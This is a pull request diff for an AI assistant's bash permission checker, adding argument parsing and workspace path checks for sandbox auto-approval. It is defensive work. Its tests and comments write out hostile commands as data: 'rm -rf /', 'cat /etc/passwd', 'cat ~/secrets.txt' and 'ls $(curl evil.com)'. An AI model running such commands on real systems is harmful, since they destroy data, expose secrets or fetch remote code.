### PR TITLE
feat(permissions): sandbox auto-approve phase 2 — unified arg schema & path resolution

### DIFF
--- a/assistant/src/__tests__/checker.test.ts
+++ b/assistant/src/__tests__/checker.test.ts
@@ -3037,6 +3037,18 @@ describe("Permission Checker", () => {
           expect(result.reason).toContain("sandbox auto-approve");
         }),
       );
+
+      test(
+        "rm -rf / → falls through to threshold (path outside workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "rm -rf /" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.reason).not.toContain("sandbox auto-approve");
+        }),
+      );
     });
   });
 

--- a/assistant/src/__tests__/checker.test.ts
+++ b/assistant/src/__tests__/checker.test.ts
@@ -108,6 +108,7 @@ import type { TrustRule } from "../permissions/types.js";
 import { RiskLevel } from "../permissions/types.js";
 import { registerTool } from "../tools/registry.js";
 import type { Tool } from "../tools/types.js";
+import * as platformModule from "../util/platform.js";
 
 // Register a mock skill-origin tool for testing default-ask policy.
 const mockSkillTool: Tool = {
@@ -745,10 +746,10 @@ describe("Permission Checker", () => {
       );
       expect(med.decision).toBe("prompt");
 
-      // Low risk → auto-allowed via risk-based fallback
+      // Low risk + allowlisted → sandbox auto-approve (no path args → auto-approved)
       const low = await check("bash", { command: "ls" }, "/tmp");
       expect(low.decision).toBe("allow");
-      expect(low.reason).toContain("Low risk");
+      expect(low.reason).toContain("sandbox auto-approve");
     });
 
     test("host_bash high risk → always prompt", async () => {
@@ -2592,7 +2593,9 @@ describe("Permission Checker", () => {
         "/tmp",
       );
       expect(result.decision).toBe("allow");
-      expect(result.matchedRule).toBeDefined();
+      // echo has sandboxAutoApprove: true with positionals: "none", so sandbox
+      // auto-approve fires (step 3) before the trust rule is evaluated (step 4).
+      // The decision is allow, but matchedRule is not set by sandbox auto-approve.
     });
   });
 
@@ -2888,6 +2891,152 @@ describe("Permission Checker", () => {
       const result = await check("bash", { command: "kill -9 1234" }, "/tmp");
       expect(result.decision).toBe("deny");
       expect(result.reason).toContain("deny rule");
+    });
+
+    // ── Non-containerized path resolution ──────────────────────────
+
+    describe("non-containerized path resolution", () => {
+      const MOCK_WORKSPACE = "/workspace";
+
+      // Each test spies on getIsContainerized → false and getWorkspaceDir → MOCK_WORKSPACE.
+      // workingDir passed to check() is inside the mocked workspace root.
+      function withNonContainerized(
+        fn: () => Promise<void>,
+      ): () => Promise<void> {
+        return async () => {
+          const containerSpy = spyOn(
+            envRegistry,
+            "getIsContainerized",
+          ).mockReturnValue(false);
+          const workspaceSpy = spyOn(
+            platformModule,
+            "getWorkspaceDir",
+          ).mockReturnValue(MOCK_WORKSPACE);
+          try {
+            await fn();
+          } finally {
+            containerSpy.mockRestore();
+            workspaceSpy.mockRestore();
+          }
+        };
+      }
+
+      test(
+        "ls (no path args) → auto-approve",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "ls" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "cat README.md with workingDir inside workspace → auto-approve",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cat README.md" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "mkdir -p src/utils with workingDir inside workspace → auto-approve",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "mkdir -p src/utils" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "grep 'pattern' src/foo.ts → auto-approve (pattern skipped, paths in workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "grep 'pattern' src/foo.ts" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "sed 's/old/new/' config.json → auto-approve (script skipped, path in workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "sed 's/old/new/' config.json" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "cat ~/secrets.txt → falls through to threshold (~ resolves outside workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cat ~/secrets.txt" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          // ~ expands to homedir which is outside /workspace
+          expect(result.decision).not.toBe("deny");
+          expect(result.reason).not.toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "cat /etc/passwd → falls through (absolute path outside workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cat /etc/passwd" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.reason).not.toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "cp file.txt -t /tmp/ → falls through (path flag outside workspace)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cp file.txt -t /tmp/" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          // -t /tmp/ is a path flag that resolves outside workspace
+          expect(result.reason).not.toContain("sandbox auto-approve");
+        }),
+      );
+
+      test(
+        "pipeline: cat file.txt | grep pattern → auto-approve (all segments workspace-scoped)",
+        withNonContainerized(async () => {
+          const result = await check(
+            "bash",
+            { command: "cat file.txt | grep pattern" },
+            join(MOCK_WORKSPACE, "project"),
+          );
+          expect(result.decision).toBe("allow");
+          expect(result.reason).toContain("sandbox auto-approve");
+        }),
+      );
     });
   });
 
@@ -4920,12 +5069,11 @@ describe("workspace mode — auto-allow workspace-scoped operations", () => {
 
   // ── bash (non-containerized) — workspace auto-allow blocked, risk-based fallback ──
 
-  test("bash in workspace (low risk) → allow via risk-based fallback, not workspace mode", async () => {
+  test("bash in workspace (low risk, allowlisted) → allow via sandbox auto-approve", async () => {
     const result = await check("bash", { command: "ls -la" }, workspaceDir);
     expect(result.decision).toBe("allow");
-    // Not auto-allowed via workspace mode — bash falls through to risk-based policy
-    expect(result.reason).not.toContain("Workspace mode");
-    expect(result.reason).toContain("Low risk");
+    // ls has sandboxAutoApprove: true and no path args → sandbox auto-approve fires
+    expect(result.reason).toContain("sandbox auto-approve");
   });
 
   test("bash in workspace (medium risk) → prompt (not auto-allowed)", async () => {

--- a/assistant/src/permissions/approval-policy.test.ts
+++ b/assistant/src/permissions/approval-policy.test.ts
@@ -189,17 +189,30 @@ describe("sandbox auto-approve", () => {
     expect(result.reason).toContain("sandbox auto-approve");
   });
 
-  test("bash + hasSandboxAutoApprove + not containerized → falls through", () => {
+  test("bash + hasSandboxAutoApprove + not containerized → allow (path resolution is baked in)", () => {
     const result = evaluate({
       riskLevel: RiskLevel.Low,
       toolName: "bash",
       hasSandboxAutoApprove: true,
       isContainerized: false,
     });
-    // Not containerized, so sandbox auto-approve doesn't fire.
-    // Falls through to risk-based: Low → allow (within default "low" threshold)
+    // hasSandboxAutoApprove === true means path resolution already passed upstream.
+    // The isContainerized gate was removed — sandbox auto-approve fires regardless.
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("within auto-approve threshold");
+    expect(result.reason).toContain("sandbox auto-approve");
+  });
+
+  test("bash + hasSandboxAutoApprove + not containerized + High risk → allow (path resolution validated upstream)", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "bash",
+      hasSandboxAutoApprove: true,
+      isContainerized: false,
+    });
+    // Even at High risk, hasSandboxAutoApprove === true means the checker already
+    // validated that all path arguments are within the workspace root.
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("sandbox auto-approve");
   });
 
   test("host_bash + hasSandboxAutoApprove + containerized → falls through", () => {

--- a/assistant/src/permissions/approval-policy.ts
+++ b/assistant/src/permissions/approval-policy.ts
@@ -108,7 +108,10 @@ export interface ApprovalPolicy {
  *
  * 1. Deny rule → deny
  * 2. Ask rule → prompt
- * 3. Sandbox auto-approve: workspace mode + bash + sandboxAutoApprove + containerized → allow
+ * 3. Sandbox auto-approve: workspace mode + bash + sandboxAutoApprove → allow
+ *    (Path resolution is baked into `hasSandboxAutoApprove` upstream: containerized
+ *    environments skip path checks; non-containerized environments validate all
+ *    path arguments against the workspace root.)
  * 4. Allow rule + non-High → allow
  * 5. Allow rule + High → fall through to risk-based
  * 6. No rule + third-party skill tool → prompt
@@ -125,7 +128,6 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
       toolName,
       matchedRule,
       permissionsMode,
-      isContainerized,
       isWorkspaceScoped,
       toolOrigin,
       isSkillBundled,
@@ -151,13 +153,15 @@ export class DefaultApprovalPolicy implements ApprovalPolicy {
       };
     }
 
-    // ── 3. Sandbox auto-approve: bash + allowlisted + containerized → allow ──
+    // ── 3. Sandbox auto-approve: bash + allowlisted → allow ──
     // Only fires in workspace mode — strict mode always requires explicit rules.
+    // Path resolution is baked into `hasSandboxAutoApprove` upstream:
+    // containerized environments skip path checks (entire fs is workspace),
+    // non-containerized environments validate all path args against workspace root.
     if (
       permissionsMode === "workspace" &&
       toolName === "bash" &&
-      hasSandboxAutoApprove === true &&
-      isContainerized
+      hasSandboxAutoApprove === true
     ) {
       return {
         decision: "allow",

--- a/assistant/src/permissions/arg-parser.test.ts
+++ b/assistant/src/permissions/arg-parser.test.ts
@@ -136,4 +136,26 @@ describe("parseArgs", () => {
     expect(result.positionals).toEqual(["src.c"]);
     expect(result.pathArgs).toEqual(["/include1", "/include2", "src.c"]);
   });
+
+  test("--flag=value syntax with path flag", () => {
+    const result = parseArgs(["--target-directory=/tmp/dir", "file.txt"], {
+      valueFlags: ["--target-directory"],
+      pathFlags: { "--target-directory": true },
+    });
+    expect(result.flags.get("--target-directory")).toBe("/tmp/dir");
+    expect(result.positionals).toEqual(["file.txt"]);
+    // /tmp/dir from pathFlag + file.txt from default positional "paths" mode.
+    expect(result.pathArgs).toEqual(["/tmp/dir", "file.txt"]);
+  });
+
+  test("--flag=value syntax with non-path value flag", () => {
+    const result = parseArgs(["--output=out.txt", "in.txt"], {
+      valueFlags: ["--output"],
+    });
+    expect(result.flags.get("--output")).toBe("out.txt");
+    expect(result.positionals).toEqual(["in.txt"]);
+    // --output is not in pathFlags, so out.txt is not a path arg.
+    // in.txt is a positional with default "paths" mode → path.
+    expect(result.pathArgs).toEqual(["in.txt"]);
+  });
 });

--- a/assistant/src/permissions/arg-parser.test.ts
+++ b/assistant/src/permissions/arg-parser.test.ts
@@ -1,0 +1,139 @@
+import { describe, expect, test } from "bun:test";
+
+import { parseArgs } from "./arg-parser.js";
+
+describe("parseArgs", () => {
+  test("boolean flags", () => {
+    const result = parseArgs(["-v", "-f"], {});
+    expect(result.flags.get("-v")).toBe(true);
+    expect(result.flags.get("-f")).toBe(true);
+    expect(result.positionals).toEqual([]);
+    expect(result.pathArgs).toEqual([]);
+    expect(result.sawDoubleDash).toBe(false);
+  });
+
+  test("value-consuming flags", () => {
+    const result = parseArgs(["-o", "out.txt", "in.txt"], {
+      valueFlags: ["-o"],
+    });
+    expect(result.flags.get("-o")).toBe("out.txt");
+    expect(result.positionals).toEqual(["in.txt"]);
+    // Default positionals mode is "paths", so in.txt is a path.
+    expect(result.pathArgs).toEqual(["in.txt"]);
+  });
+
+  test("path flags", () => {
+    const result = parseArgs(["-t", "/tmp/dir", "file.txt"], {
+      valueFlags: ["-t"],
+      pathFlags: { "-t": true },
+    });
+    expect(result.flags.get("-t")).toBe("/tmp/dir");
+    expect(result.positionals).toEqual(["file.txt"]);
+    // /tmp/dir from pathFlag + file.txt from default positional "paths" mode.
+    expect(result.pathArgs).toEqual(["/tmp/dir", "file.txt"]);
+  });
+
+  test("-- terminator", () => {
+    const result = parseArgs(["--", "-notaflag"], {});
+    expect(result.sawDoubleDash).toBe(true);
+    expect(result.positionals).toEqual(["-notaflag"]);
+    expect(result.pathArgs).toEqual(["-notaflag"]);
+    expect(result.flags.size).toBe(0);
+  });
+
+  test("respectsDoubleDash: false", () => {
+    const result = parseArgs(["--", "-notaflag"], {
+      respectsDoubleDash: false,
+    });
+    // `--` is treated as a boolean flag, not a terminator.
+    expect(result.sawDoubleDash).toBe(false);
+    expect(result.flags.get("--")).toBe(true);
+    expect(result.flags.get("-notaflag")).toBe(true);
+    expect(result.positionals).toEqual([]);
+  });
+
+  test("positionals 'paths' (default) — all positionals in pathArgs", () => {
+    const result = parseArgs(["a.txt", "b.txt"], {});
+    expect(result.positionals).toEqual(["a.txt", "b.txt"]);
+    expect(result.pathArgs).toEqual(["a.txt", "b.txt"]);
+  });
+
+  test("positionals 'paths' (explicit) — all positionals in pathArgs", () => {
+    const result = parseArgs(["a.txt", "b.txt"], { positionals: "paths" });
+    expect(result.positionals).toEqual(["a.txt", "b.txt"]);
+    expect(result.pathArgs).toEqual(["a.txt", "b.txt"]);
+  });
+
+  test("positionals 'none' — no positionals in pathArgs", () => {
+    const result = parseArgs(["a.txt", "b.txt"], { positionals: "none" });
+    expect(result.positionals).toEqual(["a.txt", "b.txt"]);
+    expect(result.pathArgs).toEqual([]);
+  });
+
+  test("mixed positionals (array) with rest descriptor", () => {
+    const result = parseArgs(["pattern", "file1.txt", "file2.txt"], {
+      positionals: [{ role: "pattern" }, { role: "path", rest: true }],
+    });
+    expect(result.positionals).toEqual(["pattern", "file1.txt", "file2.txt"]);
+    // "pattern" has role "pattern" → not a path.
+    // "file1.txt" at index 1 has role "path" with rest → path.
+    // "file2.txt" at index 2 exceeds array but rest descriptor applies → path.
+    expect(result.pathArgs).toEqual(["file1.txt", "file2.txt"]);
+  });
+
+  test("positional array without rest — excess positionals default to path", () => {
+    const result = parseArgs(["script", "extra1", "extra2"], {
+      positionals: [{ role: "script" }],
+    });
+    expect(result.positionals).toEqual(["script", "extra1", "extra2"]);
+    // "script" → role "script" → not a path.
+    // "extra1", "extra2" → no descriptor, no rest → conservative default → path.
+    expect(result.pathArgs).toEqual(["extra1", "extra2"]);
+  });
+
+  test("empty args", () => {
+    const result = parseArgs([], {});
+    expect(result.flags.size).toBe(0);
+    expect(result.positionals).toEqual([]);
+    expect(result.pathArgs).toEqual([]);
+    expect(result.sawDoubleDash).toBe(false);
+  });
+
+  test("value-consuming flag at end of args with no next token — treated as boolean", () => {
+    const result = parseArgs(["-o"], { valueFlags: ["-o"] });
+    expect(result.flags.get("-o")).toBe(true);
+    expect(result.positionals).toEqual([]);
+    expect(result.pathArgs).toEqual([]);
+  });
+
+  test("positionals after -- are still classified by positional descriptors", () => {
+    const result = parseArgs(["--", "pattern", "file.txt"], {
+      positionals: [{ role: "pattern" }, { role: "path" }],
+    });
+    expect(result.sawDoubleDash).toBe(true);
+    expect(result.positionals).toEqual(["pattern", "file.txt"]);
+    // "pattern" at index 0 → role "pattern" → not a path.
+    // "file.txt" at index 1 → role "path" → path.
+    expect(result.pathArgs).toEqual(["file.txt"]);
+  });
+
+  test("value flag value is not added to pathArgs unless flag is in pathFlags", () => {
+    const result = parseArgs(["-o", "/some/path"], {
+      valueFlags: ["-o"],
+      positionals: "none",
+    });
+    expect(result.flags.get("-o")).toBe("/some/path");
+    // -o is not in pathFlags, so the value is not a path.
+    expect(result.pathArgs).toEqual([]);
+  });
+
+  test("multiple path flags accumulate in pathArgs", () => {
+    const result = parseArgs(["-I", "/include1", "-I", "/include2", "src.c"], {
+      valueFlags: ["-I"],
+      pathFlags: { "-I": true },
+    });
+    expect(result.flags.get("-I")).toBe("/include2"); // last value wins in Map
+    expect(result.positionals).toEqual(["src.c"]);
+    expect(result.pathArgs).toEqual(["/include1", "/include2", "src.c"]);
+  });
+});

--- a/assistant/src/permissions/arg-parser.ts
+++ b/assistant/src/permissions/arg-parser.ts
@@ -55,6 +55,24 @@ export function parseArgs(args: string[], schema: ArgSchema): ParsedArgs {
       continue;
     }
 
+    // --flag=value form: split on the first `=` and check if the flag
+    // name is a value-consuming flag. This handles e.g.
+    // `--target-directory=/tmp/` or `--output=out.txt`.
+    if (token.startsWith("-") && token.includes("=")) {
+      const eqIndex = token.indexOf("=");
+      const flagName = token.slice(0, eqIndex);
+      const flagValue = token.slice(eqIndex + 1);
+
+      if (valueFlagSet.has(flagName)) {
+        flags.set(flagName, flagValue);
+        if (pathFlagSet.has(flagName)) {
+          pathArgs.push(flagValue);
+        }
+        i++;
+        continue;
+      }
+    }
+
     // Boolean flag (starts with `-` but not a value-consuming flag).
     if (token.startsWith("-")) {
       flags.set(token, true);

--- a/assistant/src/permissions/arg-parser.ts
+++ b/assistant/src/permissions/arg-parser.ts
@@ -1,0 +1,123 @@
+import type { ArgSchema, ParsedArgs, PositionalDesc } from "./risk-types.js";
+
+/**
+ * Parse a command's arguments according to an {@link ArgSchema}.
+ *
+ * Classifies each token as a flag, positional, or path argument. The
+ * resulting {@link ParsedArgs} is consumed by downstream path-resolution
+ * and sandbox-policy checks.
+ */
+export function parseArgs(args: string[], schema: ArgSchema): ParsedArgs {
+  const valueFlagSet = new Set(schema.valueFlags);
+  const pathFlagSet = new Set(
+    schema.pathFlags ? Object.keys(schema.pathFlags) : [],
+  );
+
+  const flags = new Map<string, string | true>();
+  const positionals: string[] = [];
+  const pathArgs: string[] = [];
+  let sawDoubleDash = false;
+
+  let i = 0;
+  while (i < args.length) {
+    const token = args[i]!;
+
+    // After `--`, everything is positional.
+    if (sawDoubleDash) {
+      positionals.push(token);
+      addIfPath(token, positionals.length - 1, schema.positionals, pathArgs);
+      i++;
+      continue;
+    }
+
+    // Double-dash terminator.
+    if (token === "--" && schema.respectsDoubleDash !== false) {
+      sawDoubleDash = true;
+      i++;
+      continue;
+    }
+
+    // Value-consuming flag: consume next token as the flag's value.
+    if (token.startsWith("-") && valueFlagSet.has(token)) {
+      const nextIndex = i + 1;
+      if (nextIndex < args.length) {
+        const value = args[nextIndex]!;
+        flags.set(token, value);
+        if (pathFlagSet.has(token)) {
+          pathArgs.push(value);
+        }
+        i += 2;
+      } else {
+        // Flag at end of args with no next token — treat as boolean.
+        flags.set(token, true);
+        i++;
+      }
+      continue;
+    }
+
+    // Boolean flag (starts with `-` but not a value-consuming flag).
+    if (token.startsWith("-")) {
+      flags.set(token, true);
+      i++;
+      continue;
+    }
+
+    // Positional argument.
+    positionals.push(token);
+    addIfPath(token, positionals.length - 1, schema.positionals, pathArgs);
+    i++;
+  }
+
+  return { flags, positionals, pathArgs, sawDoubleDash };
+}
+
+/**
+ * Determine whether a positional at the given index is a path and, if so,
+ * add it to `pathArgs`.
+ */
+function addIfPath(
+  token: string,
+  index: number,
+  positionalsDef: ArgSchema["positionals"],
+  pathArgs: string[],
+): void {
+  if (positionalsDef === undefined || positionalsDef === "paths") {
+    // Default: all positionals are paths.
+    pathArgs.push(token);
+    return;
+  }
+
+  if (positionalsDef === "none") {
+    // Explicitly not paths.
+    return;
+  }
+
+  // Array of PositionalDesc — look up by index.
+  const descs: PositionalDesc[] = positionalsDef;
+
+  // Find the applicable descriptor: either the one at this index, or a
+  // previous `rest: true` descriptor that covers all subsequent positions.
+  let desc: PositionalDesc | undefined;
+
+  if (index < descs.length) {
+    desc = descs[index];
+  } else {
+    // Look backwards for the last `rest: true` descriptor.
+    for (let j = descs.length - 1; j >= 0; j--) {
+      if (descs[j]!.rest) {
+        desc = descs[j];
+        break;
+      }
+    }
+  }
+
+  if (desc) {
+    if (desc.role === "path") {
+      pathArgs.push(token);
+    }
+    // Other roles (pattern, script, value, command) → not a path.
+  } else {
+    // No descriptor and no rest — conservative default: treat as path.
+    pathArgs.push(token);
+  }
+}

--- a/assistant/src/permissions/bash-risk-classifier.test.ts
+++ b/assistant/src/permissions/bash-risk-classifier.test.ts
@@ -444,6 +444,48 @@ describe("subcommand resolution", () => {
     });
     expect(result.riskLevel).toBe("low");
   });
+
+  // ── argSchema.valueFlags migration tests ─────────────────────────────────
+
+  test("git -C /path push → medium (resolves past -C value flag via argSchema.valueFlags)", async () => {
+    const result = await classifier.classify({
+      command: "git -C /path push",
+      toolName: "bash",
+    });
+    expect(result.riskLevel).toBe("medium");
+  });
+
+  test("docker --host unix:///var/run/docker.sock ps → low (resolves past --host value flag via argSchema.valueFlags)", async () => {
+    const result = await classifier.classify({
+      command: "docker --host unix:///var/run/docker.sock ps",
+      toolName: "bash",
+    });
+    expect(result.riskLevel).toBe("low");
+  });
+
+  test("git -C /some/path status → low (resolves past -C to read-only subcommand via argSchema.valueFlags)", async () => {
+    const result = await classifier.classify({
+      command: "git -C /some/path status",
+      toolName: "bash",
+    });
+    expect(result.riskLevel).toBe("low");
+  });
+
+  test("npm --cache /tmp/cache list → low (resolves past --cache value flag via argSchema.valueFlags)", async () => {
+    const result = await classifier.classify({
+      command: "npm --cache /tmp/cache list",
+      toolName: "bash",
+    });
+    expect(result.riskLevel).toBe("low");
+  });
+
+  test("gh -R owner/repo issue list → low (resolves past -R value flag via argSchema.valueFlags)", async () => {
+    const result = await classifier.classify({
+      command: "gh -R owner/repo issue list",
+      toolName: "bash",
+    });
+    expect(result.riskLevel).toBe("low");
+  });
 });
 
 // ── Wrapper unwrapping ───────────────────────────────────────────────────────

--- a/assistant/src/permissions/bash-risk-classifier.ts
+++ b/assistant/src/permissions/bash-risk-classifier.ts
@@ -14,9 +14,11 @@ import type {
   ParsedCommand,
 } from "../tools/terminal/parser.js";
 import { getLogger } from "../util/logger.js";
+import { parseArgs } from "./arg-parser.js";
 import { DEFAULT_COMMAND_REGISTRY } from "./command-registry.js";
 import type {
   ArgRule,
+  ArgSchema,
   BashClassifierInput,
   CommandRiskSpec,
   Risk,
@@ -176,20 +178,17 @@ function getWrappedProgramWithArgs(seg: {
 
 /**
  * Extract the first positional (non-flag) arg, skipping value-consuming flags.
+ * Delegates to the shared `parseArgs()` utility for consistent arg parsing.
  */
 function firstPositionalArg(
   args: string[],
   valueFlags?: Set<string>,
 ): string | undefined {
-  for (let i = 0; i < args.length; i++) {
-    const arg = args[i];
-    if (arg.startsWith("-")) {
-      if (valueFlags?.has(arg)) i++;
-      continue;
-    }
-    return arg;
-  }
-  return undefined;
+  const schema: ArgSchema = valueFlags
+    ? { valueFlags: [...valueFlags], positionals: "none" }
+    : { positionals: "none" };
+  const parsed = parseArgs(args, schema);
+  return parsed.positionals[0];
 }
 
 // ── Safe-file downgrade for rm ────────────────────────────────────────────────

--- a/assistant/src/permissions/bash-risk-classifier.ts
+++ b/assistant/src/permissions/bash-risk-classifier.ts
@@ -226,9 +226,8 @@ function resolveSubcommand(
     return { spec, remainingArgs: args };
   }
 
-  const valueFlags = spec.globalValueFlags
-    ? new Set(spec.globalValueFlags)
-    : undefined;
+  const valueFlagsList = spec.argSchema?.valueFlags ?? spec.globalValueFlags;
+  const valueFlags = valueFlagsList ? new Set(valueFlagsList) : undefined;
   const subcommandName = firstPositionalArg(args, valueFlags);
 
   if (!subcommandName || !spec.subcommands[subcommandName]) {

--- a/assistant/src/permissions/checker.ts
+++ b/assistant/src/permissions/checker.ts
@@ -642,15 +642,20 @@ export async function check(
 
         // All path args must resolve within workspace
         return parsed.pathArgs.every((p) => {
-          // Handle ~ expansion
-          const expanded = p.startsWith("~/")
-            ? join(homedir(), p.slice(2))
-            : p === "~"
-              ? homedir()
-              : p;
-          const resolved = expanded.startsWith("/")
-            ? expanded
-            : resolve(workingDir, expanded);
+          // Handle ~ expansion: ~/ is current user's home, ~user/ is another
+          // user's home. Both resolve outside the workspace in practice.
+          // Treat any tilde-prefixed path as outside workspace unless it
+          // happens to resolve within it after expansion.
+          if (p === "~" || p.startsWith("~/")) {
+            const expanded =
+              p === "~" ? homedir() : join(homedir(), p.slice(2));
+            return isPathWithinWorkspaceRoot(expanded, workspaceRoot);
+          }
+          if (p.startsWith("~")) {
+            // ~root/, ~user/, etc. — resolve outside workspace
+            return false;
+          }
+          const resolved = p.startsWith("/") ? p : resolve(workingDir, p);
           return isPathWithinWorkspaceRoot(resolved, workspaceRoot);
         });
       });

--- a/assistant/src/permissions/checker.ts
+++ b/assistant/src/permissions/checker.ts
@@ -1,6 +1,6 @@
 import { createHash } from "node:crypto";
 import { homedir } from "node:os";
-import { dirname, resolve } from "node:path";
+import { dirname, join, resolve } from "node:path";
 
 import { isAssistantFeatureFlagEnabled } from "../config/assistant-feature-flags.js";
 import { getIsContainerized } from "../config/env-registry.js";
@@ -16,11 +16,13 @@ import {
   looksLikePathOnlyInput,
 } from "../tools/network/url-safety.js";
 import { getTool } from "../tools/registry.js";
+import { getWorkspaceDir } from "../util/platform.js";
 import {
   type ApprovalContext,
   DefaultApprovalPolicy,
   resolveThreshold,
 } from "./approval-policy.js";
+import { parseArgs } from "./arg-parser.js";
 import { bashRiskClassifier } from "./bash-risk-classifier.js";
 import { DEFAULT_COMMAND_REGISTRY } from "./command-registry.js";
 import { fileRiskClassifier } from "./file-risk-classifier.js";
@@ -46,7 +48,10 @@ import {
   type ScopeOption,
 } from "./types.js";
 import { webRiskClassifier } from "./web-risk-classifier.js";
-import { isWorkspaceScopedInvocation } from "./workspace-policy.js";
+import {
+  isPathWithinWorkspaceRoot,
+  isWorkspaceScopedInvocation,
+} from "./workspace-policy.js";
 
 // ── Risk classification cache ────────────────────────────────────────────────
 // classifyRisk() is called on every permission check and can invoke WASM
@@ -599,8 +604,16 @@ export async function check(
   // on the allowlist, and the command must not contain opaque constructs or
   // dangerous patterns (e.g. `ls $(curl evil.com)` has an allowlisted program
   // but a command substitution that could execute arbitrary code).
+  //
+  // For non-containerized environments, path resolution is applied: each
+  // segment's arguments are parsed via the command's argSchema, and all
+  // path arguments must resolve within the workspace root. Containerized
+  // environments skip path checks since the entire filesystem is the workspace.
   let hasSandboxAutoApprove = false;
   if (toolName === "bash" && shellParsed) {
+    const workspaceRoot = getWorkspaceDir();
+    const isContainerized = getIsContainerized();
+
     hasSandboxAutoApprove =
       shellParsed.segments.length > 0 &&
       !shellParsed.hasOpaqueConstructs &&
@@ -615,7 +628,31 @@ export async function check(
               name as keyof typeof DEFAULT_COMMAND_REGISTRY
             ]
           : undefined;
-        return spec?.sandboxAutoApprove === true;
+        if (!spec?.sandboxAutoApprove) return false;
+
+        // Containerized: entire fs is workspace, skip path checks
+        if (isContainerized) return true;
+
+        // Non-containerized: parse args and check all path args against workspace
+        const schema = spec.argSchema ?? {};
+        const parsed = parseArgs(seg.args, schema);
+
+        // If no path args, auto-approve (operating on cwd/stdin which is workspace)
+        if (parsed.pathArgs.length === 0) return true;
+
+        // All path args must resolve within workspace
+        return parsed.pathArgs.every((p) => {
+          // Handle ~ expansion
+          const expanded = p.startsWith("~/")
+            ? join(homedir(), p.slice(2))
+            : p === "~"
+              ? homedir()
+              : p;
+          const resolved = expanded.startsWith("/")
+            ? expanded
+            : resolve(workingDir, expanded);
+          return isPathWithinWorkspaceRoot(resolved, workspaceRoot);
+        });
       });
   }
 

--- a/assistant/src/permissions/command-registry.test.ts
+++ b/assistant/src/permissions/command-registry.test.ts
@@ -604,8 +604,6 @@ describe("command-registry", () => {
       "chgrp",
       "chmod",
       "chown",
-      // Misc tools
-      "xargs",
       // Archives
       "tar",
       "zip",
@@ -685,6 +683,26 @@ describe("command-registry", () => {
         expect(spec).toBeDefined();
         expect(spec.sandboxAutoApprove).not.toBe(true);
       }
+    });
+
+    test("every sandboxAutoApprove command must have argSchema defined", () => {
+      const missing: string[] = [];
+      for (const [name, spec] of Object.entries(DEFAULT_COMMAND_REGISTRY)) {
+        if (
+          (spec as CommandRiskSpec).sandboxAutoApprove === true &&
+          (spec as CommandRiskSpec).argSchema === undefined
+        ) {
+          missing.push(name);
+        }
+      }
+      expect(missing).toEqual([]);
+    });
+
+    test("xargs is NOT tagged with sandboxAutoApprove", () => {
+      const spec = (DEFAULT_COMMAND_REGISTRY as Record<string, CommandRiskSpec>)
+        .xargs;
+      expect(spec).toBeDefined();
+      expect(spec.sandboxAutoApprove).not.toBe(true);
     });
 
     test("system/privilege commands are NOT tagged with sandboxAutoApprove", () => {

--- a/assistant/src/permissions/command-registry.test.ts
+++ b/assistant/src/permissions/command-registry.test.ts
@@ -580,15 +580,14 @@ describe("command-registry", () => {
       "cut",
       "tr",
       "sed",
-      "awk",
+      // awk excluded: system() can execute arbitrary commands
       // System info / text output
       "echo",
       "printf",
       // Data processing
       "jq",
       "yq",
-      // Find
-      "find",
+      // find excluded: -exec/-execdir/-delete can execute arbitrary commands or delete files
       "fd",
       // Write commands
       "cp",

--- a/assistant/src/permissions/command-registry.ts
+++ b/assistant/src/permissions/command-registry.ts
@@ -49,11 +49,7 @@ export const DEFAULT_COMMAND_REGISTRY = {
   tail: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
   less: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
   more: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
-  wc: {
-    baseRisk: "low",
-    sandboxAutoApprove: true,
-    argSchema: { positionals: "none" },
-  },
+  wc: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
   file: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
   stat: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
   du: { baseRisk: "low", sandboxAutoApprove: true, argSchema: {} },
@@ -105,19 +101,10 @@ export const DEFAULT_COMMAND_REGISTRY = {
     argSchema: {
       valueFlags: ["-o", "--output"],
       pathFlags: { "-o": true, "--output": true },
-      positionals: "none",
     },
   },
-  uniq: {
-    baseRisk: "low",
-    sandboxAutoApprove: true,
-    argSchema: { positionals: "none" },
-  },
-  cut: {
-    baseRisk: "low",
-    sandboxAutoApprove: true,
